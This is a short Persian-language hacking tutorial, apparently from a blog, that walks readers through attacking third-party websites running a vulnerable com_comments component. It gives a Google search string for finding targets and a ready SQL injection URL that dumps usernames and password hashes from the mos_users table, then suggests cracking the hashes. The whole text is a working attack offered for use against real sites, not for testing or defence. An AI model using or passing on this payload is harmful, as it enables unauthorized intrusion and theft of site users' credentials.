|
امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو گذاشتم! این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای مدیریت محتوای (com_comments) هستند به هک یوزر و پسورد کاربران این قبیل سایت ها بپردازید! خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید: "Review Script", "Phil Taylor" حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید: index.php?option=com_comments&task=view&id=
-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSWORD)
,0,0,0,0,0,0+FROM+mos_users+union+select+*+from+mos_content_
comments+where+1=1 حال مشاهده خواهید کرد که پسورد های کاربران سایت را به صورت Encode شده در اختیار شما قرار داده می شود و شما می توانید به وسیله یک برنامه Encode پسورد های اصلی را به دست آورید! به نقل از پسورد 35
|
